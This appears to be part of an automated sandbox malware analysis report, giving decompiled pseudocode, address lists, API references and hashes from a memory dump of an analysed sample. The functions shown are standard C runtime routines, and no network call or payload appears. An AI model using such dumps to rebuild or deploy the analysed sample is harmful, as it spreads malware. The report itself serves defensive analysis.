                                                                                                                                                                                                      0x0040584f
                                                                                                                                                                                                      0x004057ea
                                                                                                                                                                                                      0x00000000

                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • _malloc.LIBCMT ref: 004057DE
                                                                                                                                                                                                        • Part of subcall function 0040B84D: __FF_MSGBANNER.LIBCMT ref: 0040B870
                                                                                                                                                                                                        • Part of subcall function 0040B84D: __NMSG_WRITE.LIBCMT ref: 0040B877
                                                                                                                                                                                                        • Part of subcall function 0040B84D: RtlAllocateHeap.NTDLL(00000000,-0000000E,00000001,00000000,00000000,?,00411C86,00000001,00000001,00000001,?,0040D66A,00000018,00421240,0000000C,0040D6FB), ref: 0040B8C4
                                                                                                                                                                                                      • _malloc.LIBCMT ref: 00405842
                                                                                                                                                                                                      • _malloc.LIBCMT ref: 00405906
                                                                                                                                                                                                      • _malloc.LIBCMT ref: 00405930
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000006.00000002.408060927.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000006.00000002.408060927.0000000000426000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000006.00000002.408060927.000000000044D000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_400000_kLL28QE.jbxd
                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: _malloc$AllocateHeap
                                                                                                                                                                                                      • String ID: 1.2.3
                                                                                                                                                                                                      • API String ID: 680241177-2310465506
                                                                                                                                                                                                      • Opcode ID: 64d57b24c90c17737e8f9baa349f19b9f9970d6aaf881d525023fd74c78c4ea3
                                                                                                                                                                                                      • Instruction ID: 6f54ea0e5a0cddcbb7a6eab5c61130b8c10e9e343dc86a4c4a61a5a67c51a18e
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 64d57b24c90c17737e8f9baa349f19b9f9970d6aaf881d525023fd74c78c4ea3
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 8B61F7B1944B408FD720AF2A888066BBBE0FB45314F548D3FE5D5A3781D739D8498F5A
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      C-Code - Quality: 85%
                                                                                                                                                                                                      			E0040BCC2(signed int __edx, char* _a4, signed int _a8, signed int _a12, signed int _a16, signed int _a20) {
                                                                                                                                                                                                      				signed int _v8;
                                                                                                                                                                                                      				char* _v12;
                                                                                                                                                                                                      				signed int _v16;
                                                                                                                                                                                                      				signed int _v20;
                                                                                                                                                                                                      				void* __ebx;
                                                                                                                                                                                                      				void* __edi;
                                                                                                                                                                                                      				void* __esi;
                                                                                                                                                                                                      				void* __ebp;
                                                                                                                                                                                                      				signed int _t90;
                                                                                                                                                                                                      				intOrPtr* _t92;
                                                                                                                                                                                                      				signed int _t94;
                                                                                                                                                                                                      				char _t97;
                                                                                                                                                                                                      				signed int _t105;
                                                                                                                                                                                                      				void* _t106;
                                                                                                                                                                                                      				signed int _t107;
                                                                                                                                                                                                      				signed int _t110;
                                                                                                                                                                                                      				signed int _t113;
                                                                                                                                                                                                      				intOrPtr* _t114;
                                                                                                                                                                                                      				signed int _t118;
                                                                                                                                                                                                      				signed int _t119;
                                                                                                                                                                                                      				signed int _t120;
                                                                                                                                                                                                      				char* _t121;
                                                                                                                                                                                                      				signed int _t125;
                                                                                                                                                                                                      				signed int _t131;
                                                                                                                                                                                                      				signed int _t133;
                                                                                                                                                                                                      				void* _t134;
                                                                                                                                                                                                      
                                                                                                                                                                                                      				_t125 = __edx;
                                                                                                                                                                                                      				_t121 = _a4;
                                                                                                                                                                                                      				_t119 = _a8;
                                                                                                                                                                                                      				_t131 = 0;
                                                                                                                                                                                                      				_v12 = _t121;
                                                                                                                                                                                                      				_v8 = _t119;
                                                                                                                                                                                                      				if(_a12 == 0 || _a16 == 0) {
                                                                                                                                                                                                      					L5:
                                                                                                                                                                                                      					return 0;
                                                                                                                                                                                                      				} else {
                                                                                                                                                                                                      					_t138 = _t121;
                                                                                                                                                                                                      					if(_t121 != 0) {
                                                                                                                                                                                                      						_t133 = _a20;
                                                                                                                                                                                                      						__eflags = _t133;
                                                                                                                                                                                                      						if(_t133 == 0) {
                                                                                                                                                                                                      							L9:
                                                                                                                                                                                                      							__eflags = _t119 - 0xffffffff;
                                                                                                                                                                                                      							if(_t119 != 0xffffffff) {
                                                                                                                                                                                                      								_t90 = E0040BA30(_t131, _t121, _t131, _t119);
                                                                                                                                                                                                      								_t134 = _t134 + 0xc;
                                                                                                                                                                                                      							}
                                                                                                                                                                                                      							__eflags = _t133 - _t131;
                                                                                                                                                                                                      							if(__eflags == 0) {
                                                                                                                                                                                                      								goto L3;
                                                                                                                                                                                                      							} else {
                                                                                                                                                                                                      								_t94 = _t90 | 0xffffffff;
                                                                                                                                                                                                      								_t125 = _t94 % _a12;
                                                                                                                                                                                                      								__eflags = _a16 - _t94 / _a12;
                                                                                                                                                                                                      								if(__eflags > 0) {
                                                                                                                                                                                                      									goto L3;
                                                                                                                                                                                                      								}
                                                                                                                                                                                                      								L13:
                                                                                                                                                                                                      								_t131 = _a12 * _a16;
                                                                                                                                                                                                      								__eflags =  *(_t133 + 0xc) & 0x0000010c;
                                                                                                                                                                                                      								_v20 = _t131;
                                                                                                                                                                                                      								_t120 = _t131;
                                                                                                                                                                                                      								if(( *(_t133 + 0xc) & 0x0000010c) == 0) {
                                                                                                                                                                                                      									_v16 = 0x1000;
                                                                                                                                                                                                      								} else {
                                                                                                                                                                                                      									_v16 =  *((intOrPtr*)(_t133 + 0x18));
                                                                                                                                                                                                      								}
                                                                                                                                                                                                      								__eflags = _t131;
                                                                                                                                                                                                      								if(_t131 == 0) {
                                                                                                                                                                                                      									L40:
                                                                                                                                                                                                      									return _a16;
                                                                                                                                                                                                      								} else {
                                                                                                                                                                                                      									do {
                                                                                                                                                                                                      										__eflags =  *(_t133 + 0xc) & 0x0000010c;
                                                                                                                                                                                                      										if(( *(_t133 + 0xc) & 0x0000010c) == 0) {
                                                                                                                                                                                                      											L24:
                                                                                                                                                                                                      											__eflags = _t120 - _v16;
                                                                                                                                                                                                      											if(_t120 < _v16) {
                                                                                                                                                                                                      												_t97 = E0040FC07(_t120, _t125, _t133);
                                                                                                                                                                                                      												__eflags = _t97 - 0xffffffff;
                                                                                                                                                                                                      												if(_t97 == 0xffffffff) {
                                                                                                                                                                                                      													L48:
                                                                                                                                                                                                      													return (_t131 - _t120) / _a12;
                                                                                                                                                                                                      												}
                                                                                                                                                                                                      												__eflags = _v8;
                                                                                                                                                                                                      												if(_v8 == 0) {
                                                                                                                                                                                                      													L44:
                                                                                                                                                                                                      													__eflags = _a8 - 0xffffffff;
                                                                                                                                                                                                      													if(__eflags != 0) {
                                                                                                                                                                                                      														E0040BA30(_t131, _a4, 0, _a8);
                                                                                                                                                                                                      														_t134 = _t134 + 0xc;
                                                                                                                                                                                                      													}
                                                                                                                                                                                                      													 *((intOrPtr*)(E0040BFC1(__eflags))) = 0x22;
                                                                                                                                                                                                      													_push(0);
                                                                                                                                                                                                      													_push(0);
                                                                                                                                                                                                      													_push(0);
                                                                                                                                                                                                      													_push(0);
                                                                                                                                                                                                      													_push(0);
                                                                                                                                                                                                      													L4:
                                                                                                                                                                                                      													E0040E744(_t125, _t131, _t133);
                                                                                                                                                                                                      													goto L5;
                                                                                                                                                                                                      												}
                                                                                                                                                                                                      												_t123 = _v12;
                                                                                                                                                                                                      												_v12 = _v12 + 1;
                                                                                                                                                                                                      												 *_v12 = _t97;
                                                                                                                                                                                                      												_t120 = _t120 - 1;
                                                                                                                                                                                                      												_t70 =  &_v8;
                                                                                                                                                                                                      												 *_t70 = _v8 - 1;
                                                                                                                                                                                                      												__eflags =  *_t70;
                                                                                                                                                                                                      												_v16 =  *((intOrPtr*)(_t133 + 0x18));
                                                                                                                                                                                                      												goto L39;
                                                                                                                                                                                                      											}
                                                                                                                                                                                                      											__eflags = _v16;
                                                                                                                                                                                                      											if(_v16 == 0) {
                                                                                                                                                                                                      												_t105 = 0x7fffffff;
                                                                                                                                                                                                      												__eflags = _t120 - 0x7fffffff;
                                                                                                                                                                                                      												if(_t120 <= 0x7fffffff) {
                                                                                                                                                                                                      													_t105 = _t120;
                                                                                                                                                                                                      												}
                                                                                                                                                                                                      											} else {
                                                                                                                                                                                                      												__eflags = _t120 - 0x7fffffff;
                                                                                                                                                                                                      												if(_t120 <= 0x7fffffff) {
                                                                                                                                                                                                      													_t55 = _t120 % _v16;
                                                                                                                                                                                                      													__eflags = _t55;
                                                                                                                                                                                                      													_t125 = _t55;
                                                                                                                                                                                                      													_t110 = _t120;
                                                                                                                                                                                                      												} else {
                                                                                                                                                                                                      													_t125 = 0x7fffffff % _v16;
                                                                                                                                                                                                      													_t110 = 0x7fffffff;
                                                                                                                                                                                                      												}
                                                                                                                                                                                                      												_t105 = _t110 - _t125;
                                                                                                                                                                                                      											}
                                                                                                                                                                                                      											__eflags = _t105 - _v8;
                                                                                                                                                                                                      											if(_t105 > _v8) {
                                                                                                                                                                                                      												goto L44;
                                                                                                                                                                                                      											} else {
                                                                                                                                                                                                      												_push(_t105);
                                                                                                                                                                                                      												_push(_v12);
                                                                                                                                                                                                      												_t106 = E0040FA20(_t125, _t131, _t133);
                                                                                                                                                                                                      												_pop(_t123);
                                                                                                                                                                                                      												_push(_t106);
                                                                                                                                                                                                      												_t107 = E004102F4(_t120, _t125, _t131, _t133, __eflags);
                                                                                                                                                                                                      												_t134 = _t134 + 0xc;
                                                                                                                                                                                                      												__eflags = _t107;
                                                                                                                                                                                                      												if(_t107 == 0) {
                                                                                                                                                                                                      													 *(_t133 + 0xc) =  *(_t133 + 0xc) | 0x00000010;
                                                                                                                                                                                                      													goto L48;
                                                                                                                                                                                                      												}
                                                                                                                                                                                                      												__eflags = _t107 - 0xffffffff;
                                                                                                                                                                                                      												if(_t107 == 0xffffffff) {
                                                                                                                                                                                                      													L47:
                                                                                                                                                                                                      													_t80 = _t133 + 0xc;
                                                                                                                                                                                                      													 *_t80 =  *(_t133 + 0xc) | 0x00000020;
                                                                                                                                                                                                      													__eflags =  *_t80;
                                                                                                                                                                                                      													goto L48;
                                                                                                                                                                                                      												}
                                                                                                                                                                                                      												_v12 = _v12 + _t107;
                                                                                                                                                                                                      												_t120 = _t120 - _t107;
                                                                                                                                                                                                      												_v8 = _v8 - _t107;
                                                                                                                                                                                                      												goto L39;
                                                                                                                                                                                                      											}
                                                                                                                                                                                                      										}
                                                                                                                                                                                                      										_t113 =  *(_t133 + 4);
                                                                                                                                                                                                      										__eflags = _t113;
                                                                                                                                                                                                      										if(__eflags == 0) {
                                                                                                                                                                                                      											goto L24;
                                                                                                                                                                                                      										}
                                                                                                                                                                                                      										if(__eflags < 0) {
                                                                                                                                                                                                      											goto L47;
                                                                                                                                                                                                      										}
                                                                                                                                                                                                      										_t131 = _t120;
                                                                                                                                                                                                      										__eflags = _t120 - _t113;
                                                                                                                                                                                                      										if(_t120 >= _t113) {
                                                                                                                                                                                                      											_t131 = _t113;
                                                                                                                                                                                                      										}
                                                                                                                                                                                                      										__eflags = _t131 - _v8;
                                                                                                                                                                                                      										if(_t131 > _v8) {
                                                                                                                                                                                                      											_t133 = 0;
                                                                                                                                                                                                      											__eflags = _a8 - 0xffffffff;
                                                                                                                                                                                                      											if(__eflags != 0) {
                                                                                                                                                                                                      												E0040BA30(_t131, _a4, 0, _a8);
                                                                                                                                                                                                      												_t134 = _t134 + 0xc;
                                                                                                                                                                                                      											}
                                                                                                                                                                                                      											_t114 = E0040BFC1(__eflags);
                                                                                                                                                                                                      											_push(_t133);
                                                                                                                                                                                                      											_push(_t133);
                                                                                                                                                                                                      											_push(_t133);
                                                                                                                                                                                                      											_push(_t133);
                                                                                                                                                                                                      											 *_t114 = 0x22;
                                                                                                                                                                                                      											_push(_t133);
                                                                                                                                                                                                      											goto L4;
                                                                                                                                                                                                      										} else {
                                                                                                                                                                                                      											E004103F1(_t120, _t123, _t125, _v12, _v8,  *_t133, _t131);
                                                                                                                                                                                                      											 *(_t133 + 4) =  *(_t133 + 4) - _t131;
                                                                                                                                                                                                      											 *_t133 =  *_t133 + _t131;
                                                                                                                                                                                                      											_v12 = _v12 + _t131;
                                                                                                                                                                                                      											_t120 = _t120 - _t131;
                                                                                                                                                                                                      											_t134 = _t134 + 0x10;
                                                                                                                                                                                                      											_v8 = _v8 - _t131;
                                                                                                                                                                                                      											_t131 = _v20;
                                                                                                                                                                                                      										}
                                                                                                                                                                                                      										L39:
                                                                                                                                                                                                      										__eflags = _t120;
                                                                                                                                                                                                      									} while (_t120 != 0);
                                                                                                                                                                                                      									goto L40;
                                                                                                                                                                                                      								}
                                                                                                                                                                                                      							}
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      						_t118 = _t90 | 0xffffffff;
                                                                                                                                                                                                      						_t90 = _t118 / _a12;
                                                                                                                                                                                                      						_t125 = _t118 % _a12;
                                                                                                                                                                                                      						__eflags = _a16 - _t90;
                                                                                                                                                                                                      						if(_a16 <= _t90) {
                                                                                                                                                                                                      							goto L13;
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      						goto L9;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					L3:
                                                                                                                                                                                                      					_t92 = E0040BFC1(_t138);
                                                                                                                                                                                                      					_push(_t131);
                                                                                                                                                                                                      					_push(_t131);
                                                                                                                                                                                                      					_push(_t131);
                                                                                                                                                                                                      					_push(_t131);
                                                                                                                                                                                                      					 *_t92 = 0x16;
                                                                                                                                                                                                      					_push(_t131);
                                                                                                                                                                                                      					goto L4;
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      			}





























                                                                                                                                                                                                      0x0040bcc2
                                                                                                                                                                                                      0x0040bcca
                                                                                                                                                                                                      0x0040bcce
                                                                                                                                                                                                      0x0040bcd3
                                                                                                                                                                                                      0x0040bcd5
                                                                                                                                                                                                      0x0040bcd8
                                                                                                                                                                                                      0x0040bcde
                                                                                                                                                                                                      0x0040bd01
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x0040bce5
                                                                                                                                                                                                      0x0040bce5
                                                                                                                                                                                                      0x0040bce7
                                                                                                                                                                                                      0x0040bd08
                                                                                                                                                                                                      0x0040bd0b
                                                                                                                                                                                                      0x0040bd0d
                                                                                                                                                                                                      0x0040bd1c
                                                                                                                                                                                                      0x0040bd1c
                                                                                                                                                                                                      0x0040bd1f
                                                                                                                                                                                                      0x0040bd24
                                                                                                                                                                                                      0x0040bd29
                                                                                                                                                                                                      0x0040bd29
                                                                                                                                                                                                      0x0040bd2c
                                                                                                                                                                                                      0x0040bd2e
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x0040bd30
                                                                                                                                                                                                      0x0040bd30
                                                                                                                                                                                                      0x0040bd35
                                                                                                                                                                                                      0x0040bd38
                                                                                                                                                                                                      0x0040bd3b
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x0040bd3d
                                                                                                                                                                                                      0x0040bd40
                                                                                                                                                                                                      0x0040bd44
                                                                                                                                                                                                      0x0040bd4b
                                                                                                                                                                                                      0x0040bd4e
                                                                                                                                                                                                      0x0040bd50
                                                                                                                                                                                                      0x0040bd5a
                                                                                                                                                                                                      0x0040bd52
                                                                                                                                                                                                      0x0040bd55
                                                                                                                                                                                                      0x0040bd55
                                                                                                                                                                                                      0x0040bd61
                                                                                                                                                                                                      0x0040bd63
                                                                                                                                                                                                      0x0040be53
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x0040bd69
                                                                                                                                                                                                      0x0040bd69
                                                                                                                                                                                                      0x0040bd69
                                                                                                                                                                                                      0x0040bd70
                                                                                                                                                                                                      0x0040bdb6
                                                                                                                                                                                                      0x0040bdb6
                                                                                                                                                                                                      0x0040bdb9
                                                                                                                                                                                                      0x0040be24
                                                                                                                                                                                                      0x0040be2a
                                                                                                                                                                                                      0x0040be2d
                                                                                                                                                                                                      0x0040beb8
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x0040bebe
                                                                                                                                                                                                      0x0040be33
                                                                                                                                                                                                      0x0040be37
                                                                                                                                                                                                      0x0040be87
                                                                                                                                                                                                      0x0040be87
                                                                                                                                                                                                      0x0040be8b
                                                                                                                                                                                                      0x0040be95
                                                                                                                                                                                                      0x0040be9a
                                                                                                                                                                                                      0x0040be9a
                                                                                                                                                                                                      0x0040bea2
                                                                                                                                                                                                      0x0040beaa
                                                                                                                                                                                                      0x0040beab
                                                                                                                                                                                                      0x0040beac
                                                                                                                                                                                                      0x0040bead
                                                                                                                                                                                                      0x0040beae
                                                                                                                                                                                                      0x0040bcf9
                                                                                                                                                                                                      0x0040bcf9
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x0040bcfe
                                                                                                                                                                                                      0x0040be39
                                                                                                                                                                                                      0x0040be3c
                                                                                                                                                                                                      0x0040be3f
                                                                                                                                                                                                      0x0040be44
                                                                                                                                                                                                      0x0040be45
                                                                                                                                                                                                      0x0040be45
                                                                                                                                                                                                      0x0040be45
                                                                                                                                                                                                      0x0040be48
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x0040be48
                                                                                                                                                                                                      0x0040bdbb
                                                                                                                                                                                                      0x0040bdbf
                                                                                                                                                                                                      0x0040bde0
                                                                                                                                                                                                      0x0040bde5
                                                                                                                                                                                                      0x0040bde7
                                                                                                                                                                                                      0x0040bde9
                                                                                                                                                                                                      0x0040bde9
                                                                                                                                                                                                      0x0040bdc1
                                                                                                                                                                                                      0x0040bdc8
                                                                                                                                                                                                      0x0040bdca
                                                                                                                                                                                                      0x0040bdd7
                                                                                                                                                                                                      0x0040bdd7
                                                                                                                                                                                                      0x0040bdd7
                                                                                                                                                                                                      0x0040bdda
                                                                                                                                                                                                      0x0040bdcc
                                                                                                                                                                                                      0x0040bdce
                                                                                                                                                                                                      0x0040bdd1
                                                                                                                                                                                                      0x0040bdd1
                                                                                                                                                                                                      0x0040bddc
                                                                                                                                                                                                      0x0040bddc
                                                                                                                                                                                                      0x0040bdeb
                                                                                                                                                                                                      0x0040bdee
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x0040bdf4
                                                                                                                                                                                                      0x0040bdf4
                                                                                                                                                                                                      0x0040bdf5
                                                                                                                                                                                                      0x0040bdf9
                                                                                                                                                                                                      0x0040bdfe
                                                                                                                                                                                                      0x0040bdff
                                                                                                                                                                                                      0x0040be00
                                                                                                                                                                                                      0x0040be05
                                                                                                                                                                                                      0x0040be08
                                                                                                                                                                                                      0x0040be0a
                                                                                                                                                                                                      0x0040bec6
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x0040bec6
                                                                                                                                                                                                      0x0040be10
                                                                                                                                                                                                      0x0040be13
                                                                                                                                                                                                      0x0040beb4
                                                                                                                                                                                                      0x0040beb4
                                                                                                                                                                                                      0x0040beb4
                                                                                                                                                                                                      0x0040beb4
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x0040beb4
                                                                                                                                                                                                      0x0040be19
                                                                                                                                                                                                      0x0040be1c
                                                                                                                                                                                                      0x0040be1e
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x0040be1e
                                                                                                                                                                                                      0x0040bdee
                                                                                                                                                                                                      0x0040bd72
                                                                                                                                                                                                      0x0040bd75
                                                                                                                                                                                                      0x0040bd77
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x0040bd79
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x0040bd7f
                                                                                                                                                                                                      0x0040bd81
                                                                                                                                                                                                      0x0040bd83
                                                                                                                                                                                                      0x0040bd85
                                                                                                                                                                                                      0x0040bd85
                                                                                                                                                                                                      0x0040bd87
                                                                                                                                                                                                      0x0040bd8a
                                                                                                                                                                                                      0x0040be5b
                                                                                                                                                                                                      0x0040be5d
                                                                                                                                                                                                      0x0040be61
                                                                                                                                                                                                      0x0040be6a
                                                                                                                                                                                                      0x0040be6f
                                                                                                                                                                                                      0x0040be6f
                                                                                                                                                                                                      0x0040be72
                                                                                                                                                                                                      0x0040be77
                                                                                                                                                                                                      0x0040be78
                                                                                                                                                                                                      0x0040be79
                                                                                                                                                                                                      0x0040be7a
                                                                                                                                                                                                      0x0040be7b
                                                                                                                                                                                                      0x0040be81
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x0040bd90
                                                                                                                                                                                                      0x0040bd99
                                                                                                                                                                                                      0x0040bd9e
                                                                                                                                                                                                      0x0040bda1
                                                                                                                                                                                                      0x0040bda3
                                                                                                                                                                                                      0x0040bda6
                                                                                                                                                                                                      0x0040bda8
                                                                                                                                                                                                      0x0040bdab
                                                                                                                                                                                                      0x0040bdae
                                                                                                                                                                                                      0x0040bdae
                                                                                                                                                                                                      0x0040be4b
                                                                                                                                                                                                      0x0040be4b
                                                                                                                                                                                                      0x0040be4b
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x0040bd69
                                                                                                                                                                                                      0x0040bd63
                                                                                                                                                                                                      0x0040bd2e
                                                                                                                                                                                                      0x0040bd0f
                                                                                                                                                                                                      0x0040bd14
                                                                                                                                                                                                      0x0040bd14
                                                                                                                                                                                                      0x0040bd17
                                                                                                                                                                                                      0x0040bd1a
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x0040bd1a
                                                                                                                                                                                                      0x0040bce9
                                                                                                                                                                                                      0x0040bce9
                                                                                                                                                                                                      0x0040bcee
                                                                                                                                                                                                      0x0040bcef
                                                                                                                                                                                                      0x0040bcf0
                                                                                                                                                                                                      0x0040bcf1
                                                                                                                                                                                                      0x0040bcf2
                                                                                                                                                                                                      0x0040bcf8
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x0040bcf8

                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000006.00000002.408060927.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000006.00000002.408060927.0000000000426000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000006.00000002.408060927.000000000044D000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_400000_kLL28QE.jbxd
                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: _memset$__filbuf__fileno__getptd_noexit__read_memcpy_s
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 3886058894-0
                                                                                                                                                                                                      • Opcode ID: c8cdba87b669e5a45588b0eb276f39e335abb1b1e80ab099951c299220f7b7ba
                                                                                                                                                                                                      • Instruction ID: 0234425abcb0213f77efd30778ac7634d7a408156a07f93f58cd91f86a00e979
                                                                                                                                                                                                      • Opcode Fuzzy Hash: c8cdba87b669e5a45588b0eb276f39e335abb1b1e80ab099951c299220f7b7ba
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1E519031A00605ABCB209F69C844A9FBB75EF41324F24863BF825B22D1D7799E51CBDD
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      C-Code - Quality: 90%
                                                                                                                                                                                                      			E00414738(void* __ebx, void* __edx, intOrPtr __edi, void* __esi, void* __eflags) {
                                                                                                                                                                                                      				signed int _t13;
                                                                                                                                                                                                      				intOrPtr _t28;
                                                                                                                                                                                                      				void* _t29;
                                                                                                                                                                                                      				void* _t30;
                                                                                                                                                                                                      
                                                                                                                                                                                                      				_t30 = __eflags;
                                                                                                                                                                                                      				_t26 = __edi;
                                                                                                                                                                                                      				_t25 = __edx;
                                                                                                                                                                                                      				_t22 = __ebx;
                                                                                                                                                                                                      				_push(0xc);
                                                                                                                                                                                                      				_push(0x4214d0);
                                                                                                                                                                                                      				E0040E1D8(__ebx, __edi, __esi);
                                                                                                                                                                                                      				_t28 = E00410735(__ebx, __edx, __edi, _t30);
                                                                                                                                                                                                      				_t13 =  *0x422e34; // 0xfffffffe
                                                                                                                                                                                                      				if(( *(_t28 + 0x70) & _t13) == 0) {
                                                                                                                                                                                                      					L6:
                                                                                                                                                                                                      					E0040D6E0(_t22, 0xc);
                                                                                                                                                                                                      					 *(_t29 - 4) =  *(_t29 - 4) & 0x00000000;
                                                                                                                                                                                                      					_t8 = _t28 + 0x6c; // 0x6c
                                                                                                                                                                                                      					_t26 =  *0x422f18; // 0x422e40
                                                                                                                                                                                                      					 *((intOrPtr*)(_t29 - 0x1c)) = E004146FA(_t8, _t26);
                                                                                                                                                                                                      					 *(_t29 - 4) = 0xfffffffe;
                                                                                                                                                                                                      					E004147A2();
                                                                                                                                                                                                      				} else {
                                                                                                                                                                                                      					_t32 =  *((intOrPtr*)(_t28 + 0x6c));
                                                                                                                                                                                                      					if( *((intOrPtr*)(_t28 + 0x6c)) == 0) {
                                                                                                                                                                                                      						goto L6;
                                                                                                                                                                                                      					} else {
                                                                                                                                                                                                      						_t28 =  *((intOrPtr*)(E00410735(_t22, __edx, _t26, _t32) + 0x6c));
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				if(_t28 == 0) {
                                                                                                                                                                                                      					E0040E79A(_t25, _t26, 0x20);
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				return E0040E21D(_t28);
                                                                                                                                                                                                      			}







                                                                                                                                                                                                      0x00414738
                                                                                                                                                                                                      0x00414738
                                                                                                                                                                                                      0x00414738
                                                                                                                                                                                                      0x00414738
                                                                                                                                                                                                      0x00414738
                                                                                                                                                                                                      0x0041473a
                                                                                                                                                                                                      0x0041473f
                                                                                                                                                                                                      0x00414749
                                                                                                                                                                                                      0x0041474b
                                                                                                                                                                                                      0x00414753
                                                                                                                                                                                                      0x00414777
                                                                                                                                                                                                      0x00414779
                                                                                                                                                                                                      0x0041477f
                                                                                                                                                                                                      0x00414783
                                                                                                                                                                                                      0x00414786
                                                                                                                                                                                                      0x00414791
                                                                                                                                                                                                      0x00414794
                                                                                                                                                                                                      0x0041479b
                                                                                                                                                                                                      0x00414755
                                                                                                                                                                                                      0x00414755
                                                                                                                                                                                                      0x00414759
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x0041475b
                                                                                                                                                                                                      0x00414760
                                                                                                                                                                                                      0x00414760
                                                                                                                                                                                                      0x00414759
                                                                                                                                                                                                      0x00414765
                                                                                                                                                                                                      0x00414769
                                                                                                                                                                                                      0x0041476e
                                                                                                                                                                                                      0x00414776

                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • __getptd.LIBCMT ref: 00414744
                                                                                                                                                                                                        • Part of subcall function 00410735: __getptd_noexit.LIBCMT ref: 00410738
                                                                                                                                                                                                        • Part of subcall function 00410735: __amsg_exit.LIBCMT ref: 00410745
                                                                                                                                                                                                      • __getptd.LIBCMT ref: 0041475B
                                                                                                                                                                                                      • __amsg_exit.LIBCMT ref: 00414769
                                                                                                                                                                                                      • __lock.LIBCMT ref: 00414779
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000006.00000002.408060927.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000006.00000002.408060927.0000000000426000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000006.00000002.408060927.000000000044D000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_400000_kLL28QE.jbxd
                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: __amsg_exit__getptd$__getptd_noexit__lock
                                                                                                                                                                                                      • String ID: @.B
                                                                                                                                                                                                      • API String ID: 3521780317-470711618
                                                                                                                                                                                                      • Opcode ID: f43c5434038c0e2b3130a40ea1e7b9b854db78837d0c16722a3a572f716d4dbb
                                                                                                                                                                                                      • Instruction ID: 91aff3cf2d6bbea4e2ea5d49e8e08bf0f41c3eb50374f8394f27d7b6c467aa53
                                                                                                                                                                                                      • Opcode Fuzzy Hash: f43c5434038c0e2b3130a40ea1e7b9b854db78837d0c16722a3a572f716d4dbb
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 60F09631A407009BE720BB66850678D73A06F81719F91456FE4646B2D1CB7C6981CA5D
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      C-Code - Quality: 77%
                                                                                                                                                                                                      			E0040C73D(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4) {
                                                                                                                                                                                                      				intOrPtr _v8;
                                                                                                                                                                                                      				void* _t16;
                                                                                                                                                                                                      				void* _t17;
                                                                                                                                                                                                      				intOrPtr _t19;
                                                                                                                                                                                                      				void* _t21;
                                                                                                                                                                                                      				signed int _t22;
                                                                                                                                                                                                      				intOrPtr* _t27;
